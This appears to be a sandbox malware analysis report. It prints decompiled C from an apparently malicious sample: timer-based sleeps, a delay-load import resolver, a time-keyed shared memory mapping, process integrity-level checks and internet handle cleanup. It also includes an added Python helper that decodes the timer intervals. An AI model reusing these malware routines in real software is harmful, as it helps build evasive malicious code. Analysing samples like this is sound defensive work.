            Similarity
            • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
            • String ID: @MetNet
            • API String ID: 2290446683-2109406137
            • Opcode ID: 348af19b77194b06a5beb9efdadb4eac86956e62e3cf9d42f7d79961bd5e4ac0
            • Instruction ID: 970b87c1465faefc2f14705f4ce91d4aa115d2e77911871d203d27677ff4aa11
            • Opcode Fuzzy Hash: 348af19b77194b06a5beb9efdadb4eac86956e62e3cf9d42f7d79961bd5e4ac0
            • Instruction Fuzzy Hash: 57418071A00318BFD7329F65CD88E9BBBBDFB84714F21492AF502D10A0D735A658DB20
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Flattened block/edge list (graph figure not reproduced): blocks 2026815-20269dc; API calls by block: memset, CreateWaitableTimerA (2026815); _allmul, SetWaitableTimer, WaitForMultipleObjects (202684d and 202698f); CloseHandle (2026951); calls into 2025251 (20268b1), 20235d2 (20268e0), 20269e6 (202691c), 20263f6 (202696c)
            C-Code - Quality: 83%
            			E02026815(void* __edx, intOrPtr _a4, intOrPtr _a8) {
            				void _v48;
            				long _v52;
            				struct %anon52 _v60;
            				char _v72;
            				long _v76;
            				void* _v80;
            				union _LARGE_INTEGER _v84;
            				struct %anon52 _v92;
            				void* _v96;
            				void* _v100;
            				union _LARGE_INTEGER _v104;
            				long _v108;
            				struct %anon52 _v124;
            				long _v128;
            				struct %anon52 _t46;
            				void* _t51;
            				long _t53;
            				void* _t54;
            				struct %anon52 _t61;
            				long _t65;
            				struct %anon52 _t66;
            				void* _t69;
            				void* _t73;
            				signed int _t74;
            				void* _t76;
            				void* _t78;
            				void** _t82;
            				signed int _t86;
            				void* _t89;
            
            				_t76 = __edx;
            				_v52 = 0;
            				memset( &_v48, 0, 0x2c);
            				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
            				_t46 = CreateWaitableTimerA(0, 1, 0);
            				_v60 = _t46;
            				if(_t46 == 0) {
            					_v92.HighPart = GetLastError();
            				} else {
            					_push(0xffffffff);
            					_push(0xff676980);
            					_push(0);
            					_push( *0x202a2e0);
            					_v76 = 0;
            					_v80 = 0;
            					L020282DA();
            					_v84.LowPart = _t46;
            					_v80 = _t76;
            					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
            					_t51 =  *0x202a30c; // 0x1b4
            					_v76 = _t51;
            					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
            					_v108 = _t53;
            					if(_t53 == 0) {
            						if(_a8 != 0) {
            							L4:
            							 *0x202a2ec = 5;
            						} else {
            							_t69 = E02025251(_t76); // executed
            							if(_t69 != 0) {
            								goto L4;
            							}
            						}
            						_v104.LowPart = 0;
            						L6:
            						L6:
            						if(_v104.LowPart == 1 && ( *0x202a300 & 0x00000001) == 0) {
            							_v104.LowPart = 2;
            						}
            						_t74 = _v104.LowPart;
            						_t58 = _t74 << 4;
            						_t78 = _t89 + (_t74 << 4) + 0x38;
            						_t75 = _t74 + 1;
            						_v92.LowPart = _t74 + 1;
            						_t61 = E020235D2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
            						_v124 = _t61;
            						if(_t61 != 0) {
            							goto L17;
            						}
            						_t66 = _v92;
            						_v104.LowPart = _t66;
            						if(_t66 != 3) {
            							goto L6;
            						} else {
            							_v124.HighPart = E020269E6(_t75,  &_v72, _a4, _a8);
            						}
            						goto L12;
            						L17:
            						__eflags = _t61 - 0x10d2;
            						if(_t61 != 0x10d2) {
            							_push(0xffffffff);
            							_push(0xff676980);
            							_push(0);
            							_push( *0x202a2e4);
            							goto L21;
            						} else {
            							__eflags =  *0x202a2e8; // 0x0
            							if(__eflags == 0) {
            								goto L12;
            							} else {
            								_t61 = E020263F6();
            								_push(0xffffffff);
            								_push(0xdc3cba00);
            								_push(0);
            								_push( *0x202a2e8);
            								L21:
            								L020282DA();
            								_v104.LowPart = _t61;
            								_v100 = _t78;
            								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
            								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
            								_v128 = _t65;
            								__eflags = _t65;
            								if(_t65 == 0) {
            									goto L6;
            								} else {
            									goto L12;
            								}
            							}
            						}
            						L25:
            					}
            					L12:
            					_t82 =  &_v72;
            					_t73 = 3;
            					do {
            						_t54 =  *_t82;
            						if(_t54 != 0) {
            							HeapFree( *0x202a2d8, 0, _t54);
            						}
            						_t82 =  &(_t82[4]);
            						_t73 = _t73 - 1;
            					} while (_t73 != 0);
            					CloseHandle(_v80);
            				}
            				return _v92.HighPart;
            				goto L25;
            			}
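E02026815 above sleeps on a waitable timer. Before each SetWaitableTimer the code pushes 0xffffffff, 0xff676980 (or 0xdc3cba00 on the 0x202a2e8 path), 0 and a configured dword, then calls L020282DA, which the APIs list identifies as _allmul, so EDX:EAX receives the 64-bit product of the configured count and the sign-extended constant. 0xffffffffff676980 is -10,000,000 and 0xffffffffdc3cba00 is -600,000,000. A negative due time handed to SetWaitableTimer is a relative interval in 100 ns units, so the counts at 0x202a2e0 and 0x202a2e4 are treated as seconds and the count at 0x202a2e8 as minutes. The block below is an added example, not code from the report or from the sample: it emulates _allmul and the due-time interpretation so that the sleep lengths can be read off a memory dump. The count values used as input are assumptions; the real configuration dwords are not shown in the listing.

```python
# Added example: emulates the _allmul / SetWaitableTimer arithmetic used in
# E02026815. The multiplier constants come from the listing; the counts passed
# in below are assumed sample input, not values recovered from the sample.

MUL_SECONDS = 0xff676980   # pushed as (0xff676980, 0xffffffff): -10,000,000
MUL_MINUTES = 0xdc3cba00   # pushed as (0xdc3cba00, 0xffffffff): -600,000,000
HUNDRED_NS_PER_SECOND = 10_000_000
MASK64 = (1 << 64) - 1


def to_signed64(lo, hi):
    """Combine a (low, high) dword pair into a signed 64-bit Python int."""
    value = ((hi & 0xFFFFFFFF) << 32) | (lo & 0xFFFFFFFF)
    return value - (1 << 64) if value & (1 << 63) else value


def allmul(a_lo, a_hi, b_lo, b_hi):
    """NTDLL _allmul: 64x64 -> 64-bit multiply, truncated, returned as (EAX, EDX).

    The listing pushes b_hi, b_lo, a_hi, a_lo in that order, so `a` is the
    configured count (high dword 0) and `b` is the sign-extended multiplier.
    """
    product = (to_signed64(a_lo, a_hi) * to_signed64(b_lo, b_hi)) & MASK64
    return product & 0xFFFFFFFF, product >> 32


def due_time_seconds(lo, hi):
    """Read a SetWaitableTimer due time: negative means relative, in 100 ns units."""
    value = to_signed64(lo, hi)
    if value >= 0:
        raise ValueError("positive due time is an absolute FILETIME, not an interval")
    return -value / HUNDRED_NS_PER_SECOND


def configured_sleep_seconds(count, multiplier_lo):
    """Seconds the timer in E02026815 waits for a given configured count.

    `multiplier_lo` is the low dword of the constant pushed before _allmul;
    the high dword is always 0xffffffff in the listing.
    """
    lo, hi = allmul(count, 0, multiplier_lo, 0xFFFFFFFF)
    return due_time_seconds(lo, hi)


if __name__ == "__main__":
    # Assumed counts; the dwords at 0x202a2e0 / 0x202a2e8 are not in the listing.
    print("first timer, count 5 :", configured_sleep_seconds(5, MUL_SECONDS), "s")
    print("retry timer, count 5 :", configured_sleep_seconds(5, MUL_MINUTES), "s")
```

When reading a dump, take the two dwords the decompiler shows as `_v84.LowPart`/`_v80` (or `_v104.LowPart`/`_v100`) and feed them to `due_time_seconds` directly; `configured_sleep_seconds` is for working forward from a recovered configuration value.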

            APIs
            • memset.NTDLL ref: 0202682F
            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0202683B
            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 02026863
            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 02026883
            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,020226E9,?), ref: 0202689E
            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,020226E9,?,00000000), ref: 02026945
            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,020226E9,?,00000000,?,?), ref: 02026955
            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0202698F
            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 020269A9
            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 020269B5
              • Part of subcall function 02025251: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02CA9218,00000000,?,746AF710,00000000,746AF730), ref: 020252A0
              • Part of subcall function 02025251: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02CA9160,?,00000000,30314549,00000014,004F0053,02CA9270), ref: 0202533D
              • Part of subcall function 02025251: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,020268B6), ref: 0202534F
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,020226E9,?,00000000,?,?), ref: 020269C8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
            • String ID: Uet$@MetNet
            • API String ID: 3521023985-1616585941
            • Opcode ID: bfa46d15f11166f0e289d17108e24a14b03314b264154570fbac098fa89b2d6f
            • Instruction ID: a855e523cbc60c2e50a82043e026a642d29a63f82493c9708c7d000f6335a9cc
            • Opcode Fuzzy Hash: bfa46d15f11166f0e289d17108e24a14b03314b264154570fbac098fa89b2d6f
            • Instruction Fuzzy Hash: 9A518071408324AFC7219F158C44D9BBBECFB85324F604A1BF89592190DB35D55CDF92
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Flattened block/edge list (graph figure not reproduced): blocks 2027fc5-20281ff; API calls by block: RaiseException (202802c, 20280e7, 20281be); LoadLibraryA (20280b8); InterlockedExchange (2028108); LocalAlloc (202811c); FreeLibrary (202813c); GetProcAddress (202818e)
            C-Code - Quality: 51%
            			E02027FC5(long _a4, long _a8) {
            				signed int _v8;
            				intOrPtr _v16;
            				LONG* _v28;
            				long _v40;
            				long _v44;
            				long _v48;
            				CHAR* _v52;
            				long _v56;
            				CHAR* _v60;
            				long _v64;
            				signed int* _v68;
            				char _v72;
            				signed int _t76;
            				signed int _t80;
            				signed int _t81;
            				intOrPtr* _t82;
            				intOrPtr* _t83;
            				intOrPtr* _t85;
            				intOrPtr* _t90;
            				intOrPtr* _t95;
            				intOrPtr* _t98;
            				struct HINSTANCE__* _t99;
            				void* _t102;
            				intOrPtr* _t104;
            				void* _t115;
            				long _t116;
            				void _t125;
            				void* _t131;
            				signed short _t133;
            				struct HINSTANCE__* _t138;
            				signed int* _t139;
            
            				_t139 = _a4;
            				_v28 = _t139[2] + 0x2020000;
            				_t115 = _t139[3] + 0x2020000;
            				_t131 = _t139[4] + 0x2020000;
            				_v8 = _t139[7];
            				_v60 = _t139[1] + 0x2020000;
            				_v16 = _t139[5] + 0x2020000;
            				_v64 = _a8;
            				_v72 = 0x24;
            				_v68 = _t139;
            				_v56 = 0;
            				asm("stosd");
            				_v48 = 0;
            				_v44 = 0;
            				_v40 = 0;
            				if(( *_t139 & 0x00000001) == 0) {
            					_a8 =  &_v72;
            					RaiseException(0xc06d0057, 0, 1,  &_a8);
            					return 0;
            				}
            				_t138 =  *_v28;
            				_t76 = _a8 - _t115 >> 2 << 2;
            				_t133 =  *(_t131 + _t76);
            				_a4 = _t76;
            				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
            				_v56 = _t80;
            				_t81 = _t133 + 0x2020002;
            				if(_t80 == 0) {
            					_t81 = _t133 & 0x0000ffff;
            				}
            				_v52 = _t81;
            				_t82 =  *0x202a1c0; // 0x0
            				_t116 = 0;
            				if(_t82 == 0) {
            					L6:
            					if(_t138 != 0) {
            						L18:
            						_t83 =  *0x202a1c0; // 0x0
            						_v48 = _t138;
            						if(_t83 != 0) {
            							_t116 =  *_t83(2,  &_v72);
            						}
            						if(_t116 != 0) {
            							L32:
            							 *_a8 = _t116;
            							L33:
            							_t85 =  *0x202a1c0; // 0x0
            							if(_t85 != 0) {
            								_v40 = _v40 & 0x00000000;
            								_v48 = _t138;
            								_v44 = _t116;
            								 *_t85(5,  &_v72);
            							}
            							return _t116;
            						} else {
            							if(_t139[5] == _t116 || _t139[7] == _t116) {
            								L27:
            								_t116 = GetProcAddress(_t138, _v52);
            								if(_t116 == 0) {
            									_v40 = GetLastError();
            									_t90 =  *0x202a1bc; // 0x0
            									if(_t90 != 0) {
            										_t116 =  *_t90(4,  &_v72);
            									}
            									if(_t116 == 0) {
            										_a4 =  &_v72;
            										RaiseException(0xc06d007f, _t116, 1,  &_a4);
            										_t116 = _v44;
            									}
            								}
            								goto L32;
            							} else {
            								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
            								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
            									_t116 =  *(_a4 + _v16);
            									if(_t116 != 0) {
            										goto L32;
            									}
            								}
            								goto L27;
            							}
            						}
            					}
            					_t98 =  *0x202a1c0; // 0x0
            					if(_t98 == 0) {
            						L9:
            						_t99 = LoadLibraryA(_v60); // executed
            						_t138 = _t99;
            						if(_t138 != 0) {
            							L13:
            							if(InterlockedExchange(_v28, _t138) == _t138) {
            								FreeLibrary(_t138);
            							} else {
            								if(_t139[6] != 0) {
            									_t102 = LocalAlloc(0x40, 8);
            									if(_t102 != 0) {
            										 *(_t102 + 4) = _t139;
            										_t125 =  *0x202a1b8; // 0x0
            										 *_t102 = _t125;
            										 *0x202a1b8 = _t102;
            									}
            								}
            							}
            							goto L18;
            						}
            						_v40 = GetLastError();
            						_t104 =  *0x202a1bc; // 0x0
            						if(_t104 == 0) {
            							L12:
            							_a8 =  &_v72;
            							RaiseException(0xc06d007e, 0, 1,  &_a8);
            							return _v44;
            						}
            						_t138 =  *_t104(3,  &_v72);
            						if(_t138 != 0) {
            							goto L13;
            						}
            						goto L12;
            					}
            					_t138 =  *_t98(1,  &_v72);
            					if(_t138 != 0) {
            						goto L13;
            					}
            					goto L9;
            				}
            				_t116 =  *_t82(0,  &_v72);
            				if(_t116 != 0) {
            					goto L33;
            				}
            				goto L6;
            			}

            APIs
            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0202803E
            • LoadLibraryA.KERNELBASE(?), ref: 020280BB
            • GetLastError.KERNEL32 ref: 020280C7
            • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 020280FA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: ExceptionRaise$ErrorLastLibraryLoad
            • String ID: $$@MetNet
            • API String ID: 948315288-3365357938
            • Opcode ID: ef68b7d1fdcb5df3943a58b43bb85a54c74ad777410cdd95696325a4fb8fd588
            • Instruction ID: 1ed864fe55fa914d19c0de353a20cb8f415d3722c89e38d662fb237f205b9ed3
            • Opcode Fuzzy Hash: ef68b7d1fdcb5df3943a58b43bb85a54c74ad777410cdd95696325a4fb8fd588
            • Instruction Fuzzy Hash: 3C814175A403199FDB61CF98D880B9EB7F9FF48310F25842AE905D7280EB74E949DB60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 74%
            			E0202415A(intOrPtr __edx, void** _a4, void** _a8) {
            				intOrPtr _v8;
            				struct _FILETIME* _v12;
            				short _v56;
            				struct _FILETIME* _t12;
            				intOrPtr _t13;
            				void* _t17;
            				void* _t21;
            				intOrPtr _t27;
            				long _t28;
            				void* _t30;
            
            				_t27 = __edx;
            				_t12 =  &_v12;
            				GetSystemTimeAsFileTime(_t12);
            				_push(0x192);
            				_push(0x54d38000);
            				_push(_v8);
            				_push(_v12);
            				L020282D4();
            				_push(_t12);
            				_v12 = _t12;
            				_t13 =  *0x202a348; // 0xc7d5a8
            				_t5 = _t13 + 0x202b7b4; // 0x2ca8d5c
            				_t6 = _t13 + 0x202b644; // 0x530025
            				_push(0x16);
            				_push( &_v56);
            				_v8 = _t27;
            				L02027F3A();
            				_t17 = CreateFileMappingW(0xffffffff, 0x202a34c, 4, 0, 0x1000,  &_v56); // executed
            				_t30 = _t17;
            				if(_t30 == 0) {
            					_t28 = GetLastError();
            				} else {
            					if(GetLastError() == 0xb7) {
            						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
            						if(_t21 == 0) {
            							_t28 = GetLastError();
            							if(_t28 != 0) {
            								goto L6;
            							}
            						} else {
            							 *_a4 = _t30;
            							 *_a8 = _t21;
            							_t28 = 0;
            						}
            					} else {
            						_t28 = 2;
            						L6:
            						CloseHandle(_t30);
            					}
            				}
            				return _t28;
            			}

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,020225B1,?,?,4D283A53,?,?), ref: 02024166
            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0202417C
            • _snwprintf.NTDLL ref: 020241A1
            • CreateFileMappingW.KERNELBASE(000000FF,0202A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 020241BD
            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,020225B1,?,?,4D283A53,?), ref: 020241CF
            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 020241E6
            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,020225B1,?,?,4D283A53), ref: 02024207
            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,020225B1,?,?,4D283A53,?), ref: 0202420F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
            • String ID: @MetNet
            • API String ID: 1814172918-2109406137
            • Opcode ID: 80412463d08b4ce95b55cdb20af1c3329ad31767cd792f341c9c406c4509a74d
            • Instruction ID: 66c9e8b693e43c17324f2a7afb5996b596fd4065d10386f6d0c537fe7df23cc7
            • Opcode Fuzzy Hash: 80412463d08b4ce95b55cdb20af1c3329ad31767cd792f341c9c406c4509a74d
            • Instruction Fuzzy Hash: C021C072A80328BBD721EB65CC45F9E37B9BB84B54F360022F909E6180DB70991DDB60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 01FC024D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID: AllocVirtual
            • String ID: cess$kernel32.dll
            • API String ID: 4275171209-1230238691
            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
            • Instruction ID: a5c574cd58e517a40efcf4c2b804d3ba0007d693fe7eaa4450cac5bff4cadf46
            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
            • Instruction Fuzzy Hash: 89526979A01229DFDB64CF58C984BACBBB1BF09304F1480D9E94DAB351DB31AA85DF14
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 93%
            			E02024BE7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
            				void* _t17;
            				void* _t18;
            				void* _t19;
            				void* _t20;
            				void* _t21;
            				intOrPtr _t24;
            				void* _t37;
            				void* _t41;
            				intOrPtr* _t45;
            
            				_t41 = __edi;
            				_t37 = __ebx;
            				_t45 = __eax;
            				_t16 =  *((intOrPtr*)(__eax + 0x20));
            				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
            					E020216B2(_t16, __ecx, 0xea60);
            				}
            				_t17 =  *(_t45 + 0x18);
            				_push(_t37);
            				_push(_t41);
            				if(_t17 != 0) {
            					InternetSetStatusCallback(_t17, 0);
            					InternetCloseHandle( *(_t45 + 0x18)); // executed
            				}
            				_t18 =  *(_t45 + 0x14);
            				if(_t18 != 0) {
            					InternetSetStatusCallback(_t18, 0);
            					InternetCloseHandle( *(_t45 + 0x14));
            				}
            				_t19 =  *(_t45 + 0x10);
            				if(_t19 != 0) {
            					InternetSetStatusCallback(_t19, 0);
            					InternetCloseHandle( *(_t45 + 0x10));
            				}
            				_t20 =  *(_t45 + 0x1c);
            				if(_t20 != 0) {
            					CloseHandle(_t20);
            				}
            				_t21 =  *(_t45 + 0x20);
            				if(_t21 != 0) {
            					CloseHandle(_t21);
            				}
            				_t22 =  *((intOrPtr*)(_t45 + 8));
            				if( *((intOrPtr*)(_t45 + 8)) != 0) {
            					E020261DA(_t22);
            					 *((intOrPtr*)(_t45 + 8)) = 0;
            					 *((intOrPtr*)(_t45 + 0x30)) = 0;
            				}
            				_t23 =  *((intOrPtr*)(_t45 + 0xc));
            				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
            					E020261DA(_t23);
            				}
            				_t24 =  *_t45;
            				if(_t24 != 0) {
            					_t24 = E020261DA(_t24);
            				}
            				_t46 =  *((intOrPtr*)(_t45 + 4));
            				if( *((intOrPtr*)(_t45 + 4)) != 0) {
            					return E020261DA(_t46);
            				}
            				return _t24;
            			}

            APIs
            • InternetSetStatusCallback.WININET(?,00000000), ref: 02024C15
            • InternetCloseHandle.WININET(?), ref: 02024C1A
            • InternetSetStatusCallback.WININET(?,00000000), ref: 02024C25
            • InternetCloseHandle.WININET(?), ref: 02024C2A
            • InternetSetStatusCallback.WININET(?,00000000), ref: 02024C35
            • InternetCloseHandle.WININET(?), ref: 02024C3A
            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,02022248,?,?,746981D0,00000000,00000000), ref: 02024C4A
            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,02022248,?,?,746981D0,00000000,00000000), ref: 02024C54
              • Part of subcall function 020216B2: WaitForMultipleObjects.KERNEL32(00000002,02027C47,00000000,02027C47,?,?,?,02027C47,0000EA60), ref: 020216CD
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
            • String ID:
            • API String ID: 2824497044-0
            • Opcode ID: 0c762e554abcef0350369b81271f916cce80d40bb0dce02e9b2b1a73a5432f78
            • Instruction ID: 4136430a4231a9c3ba1a46d67cb25c2dde477d0a45a4798a9be4a5dc69613f3e
            • Opcode Fuzzy Hash: 0c762e554abcef0350369b81271f916cce80d40bb0dce02e9b2b1a73a5432f78
            • Instruction Fuzzy Hash: 5F117F36A007785BC671AFA9DD84C5BB7EEFF442083660D1AE089D3511C735F84D9A20
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 100%
            			E02025E40(long* _a4) {
            				long _v8;
            				void* _v12;
            				void _v16;
            				long _v20;
            				int _t33;
            				void* _t46;
            
            				_v16 = 1;
            				_v20 = 0x2000;
            				if( *0x202a2fc > 5) {
            					_v16 = 0;
            					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
            						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
            						_v8 = 0;
            						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
            						if(_v8 != 0) {
            							_t46 = E020233DC(_v8);
            							if(_t46 != 0) {
            								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
            								if(_t33 != 0) {
            									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
            								}
            								E020261DA(_t46);
            							}
            						}
            						CloseHandle(_v12);
            					}
            				}
            				 *_a4 = _v20;
            				return _v16;
            			}

            APIs
            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02025E72
            • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02025E92
            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02025EA2
            • CloseHandle.KERNEL32(00000000), ref: 02025EF2
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02025EC5
            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02025ECD
            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02025EDD
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
            • String ID:
            • API String ID: 1295030180-0
            • Opcode ID: 49ad414150ead08e713bf00e7cf970d24a9be8ab470f334a820e61578a33cb3f
            • Instruction ID: 47abb9b83050b5c478ba00f7f083427d5e10bc0d5c2d103a0c56357d28333ff9
            • Opcode Fuzzy Hash: 49ad414150ead08e713bf00e7cf970d24a9be8ab470f334a820e61578a33cb3f
            • Instruction Fuzzy Hash: 5B21397590021DBFEB119F94CC84EEEBBB9FB48314F1004A6E910A6150CB759A58EF64
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 64%
            			E02026675(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
            				intOrPtr _v8;
            				intOrPtr _t9;
            				intOrPtr _t13;
            				char* _t19;
            				char* _t28;
            				void* _t33;
            				void* _t34;
            				char* _t36;
            				void* _t38;
            				intOrPtr* _t39;
            				char* _t40;
            				char* _t42;
            				char* _t43;
            
            				_t34 = __edx;
            				_push(__ecx);
            				_t9 =  *0x202a348; // 0xc7d5a8
            				_t1 = _t9 + 0x202b516; // 0x253d7325
            				_t36 = 0;
            				_t28 = E02025815(__ecx, _t1);
            				if(_t28 != 0) {
            					_t39 = __imp__;
            					_t13 =  *_t39(_t28, _t38);
            					_v8 = _t13;
            					_t6 =  *_t39(_a4) + 1; // 0x2ca9601
            					_t40 = E020233DC(_v8 + _t6);
            					if(_t40 != 0) {
            						strcpy(_t40, _t28);
            						_pop(_t33);
            						__imp__(_t40, _a4);
            						_t19 = E02025063(_t33, _t34, _t40, _a8); // executed
            						_t36 = _t19;
            						E020261DA(_t40);
            						_t42 = E02024AC7(StrTrimA(_t36, "="), _t36);
            						if(_t42 != 0) {
            							E020261DA(_t36);
            							_t36 = _t42;
            						}
            						_t43 = E02022708(_t36, _t33);
            						if(_t43 != 0) {
            							E020261DA(_t36);
            							_t36 = _t43;
            						}
            					}
            					E020261DA(_t28);
            				}
            				return _t36;
            			}

            APIs
